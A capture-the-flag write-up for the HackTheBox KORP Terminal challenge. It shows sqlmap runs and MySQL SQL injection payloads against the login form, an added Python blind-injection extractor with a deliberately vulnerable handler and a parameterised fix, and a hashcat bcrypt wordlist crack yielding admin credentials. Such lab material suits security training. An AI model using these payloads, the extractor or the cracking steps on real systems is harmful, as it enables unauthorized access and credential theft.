HackTheBox KORP Terminal Challenge
https://app.hackthebox.com/challenges/647
Description
Your faction must infiltrate the KORP™ terminal and gain access to the Legionaries’ privileged information and find out more about the organizers of the Fray. The terminal login screen is protected by state-of-the-art encryption and security protocols.
Exploitation
sqlmap -u "http://94.237.59.180:40492/" --method POST --data "username=a&password=a" --batch --ignore-code 401
---
Parameter: username (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: username=a' RLIKE (SELECT (CASE WHEN (5665=5665) THEN 0x61 ELSE 0x28 END))-- Isul&password=a
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: username=a' OR (SELECT 8955 FROM(SELECT COUNT(*),CONCAT(0x7178716271,(SELECT (ELT(8955=8955,1))),0x717a717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- pzFe&password=a
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=a' AND (SELECT 1571 FROM (SELECT(SLEEP(5)))MEYL)-- abGQ&password=a
---
sqlmap -u "http://94.237.59.180:40492/" --method POST --data "username=a&password=a" --batch --ignore-code 401 --dbs
sqlmap -u "http://94.237.59.180:40492/" --method POST --data "username=a&password=a" --batch --ignore-code 401 -D korp_terminal --tables
sqlmap -u "http://94.237.59.180:40492/" --method POST --data "username=a&password=a" --batch --ignore-code 401 -D korp_terminal --dump
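What sqlmap is doing behind the "boolean-based blind" finding above, as an added example (not code from the original write-up or from HackTheBox): a login handler that concatenates the form fields into its query, the 200/401 side channel it leaks through, and an extractor that pulls the admin hash out one character at a time. The real target is MySQL; an in-memory SQLite database stands in here so the script runs offline, and because SQLite has no RLIKE the per-character test uses UNICODE(SUBSTR(...)) instead of sqlmap's CASE/RLIKE payload. The users table, the column names and the stored hash string are constructed for the demo and are not the challenge's data.

```python
"""Boolean-based blind SQL injection worked end to end, as sqlmap automates it.

Added example, not code from the original write-up or from HackTheBox. The
KORP terminal runs MySQL; an in-memory SQLite database stands in here so the
script runs offline. SQLite has no RLIKE, so the per-character oracle uses
UNICODE(SUBSTR(...)) instead of sqlmap's CASE/RLIKE payload. The users table,
the column names and the stored hash are all constructed for the demo.
"""
import sqlite3

# Constructed 60-character string in bcrypt format; it is not a real hash of anything.
SAMPLE_HASH = "$2b$12$ConstructedHashForDemoOnly.abcdefghijklmnopqrstuvwxyz"


def setup_db():
    """Stand-in for the korp_terminal database: one admin row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)", ("admin", SAMPLE_HASH))
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    """Login handler with the bug: form fields are concatenated into the SQL.
    Returns the HTTP status the terminal would send: 200 when the query
    matches a row, 401 otherwise (hence --ignore-code 401 in the sqlmap run)."""
    query = (f"SELECT id FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.Error:
        return 500
    return 200 if row else 401


def safe_login(conn, username, password):
    """Hardened handler: bound parameters, so the payload is just a username that does not exist."""
    row = conn.execute("SELECT id FROM users WHERE username = ? AND password = ?",
                       (username, password)).fetchone()
    return 200 if row else 401


class BlindExtractor:
    """Reads arbitrary query results through the 200/401 side channel."""

    def __init__(self, conn):
        self.conn = conn
        self.requests = 0  # how many "HTTP requests" the extraction cost

    def oracle(self, condition):
        """True iff `condition` holds inside the injected WHERE clause.
        The trailing '-- ' comments out the rest of the original query, as in sqlmap's payloads."""
        self.requests += 1
        payload = f"a' OR ({condition})-- "
        return vulnerable_login(self.conn, payload, "a") == 200

    def extract(self, sql_expr, max_len=80):
        """Recover the string value of `sql_expr` (a scalar subquery) character by
        character, binary-searching the printable ASCII range (at most 7 requests per char)."""
        lo, hi = 0, max_len
        while lo < hi:  # first the length, so the character loop knows when to stop
            mid = (lo + hi) // 2
            if self.oracle(f"LENGTH(({sql_expr})) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        length = lo
        chars = []
        for pos in range(1, length + 1):
            lo, hi = 32, 126  # printable ASCII
            while lo < hi:
                mid = (lo + hi) // 2
                if self.oracle(f"UNICODE(SUBSTR(({sql_expr}), {pos}, 1)) > {mid}"):
                    lo = mid + 1
                else:
                    hi = mid
            chars.append(chr(lo))
        return "".join(chars)


if __name__ == "__main__":
    db = setup_db()
    ext = BlindExtractor(db)
    leaked = ext.extract("SELECT password FROM users WHERE username = 'admin'")
    print(f"admin hash: {leaked} ({ext.requests} requests)")
    # The same payload against the parameterised handler simply fails to log in.
    print("vulnerable:", vulnerable_login(db, "a' OR 1=1-- ", "a"),
          "hardened:", safe_login(db, "a' OR 1=1-- ", "a"))
```

Swapping the oracle for a real HTTP POST (the body sqlmap sent, "username=<payload>&password=a", with 200 vs 401 as the answer) is all that separates this from the live run; the binary search is why sqlmap needs only a few hundred requests per 60-character hash rather than one per candidate character.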
Crack the Hash
The dump contains the admin row with a bcrypt hash, which is hashcat mode 3200; run a wordlist attack against it with rockyou:
# read the bcrypt hash from the sqlmap dump into a temp file
echo -n "Password Hash? --> " ; read -r hash
echo "$hash" > /tmp/hash.txt
# -m 3200 = bcrypt, -a 0 = straight wordlist attack
hashcat -m 3200 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
# print the cracked hash:password pair from the potfile
hashcat -m 3200 /tmp/hash.txt --show
rm -f /tmp/hash.txt
This yields password123, so the credentials are admin:password123; log in to the terminal with them.
Summary
KORP Terminal: exploit the SQL injection, extract the needed data, and reach the flag.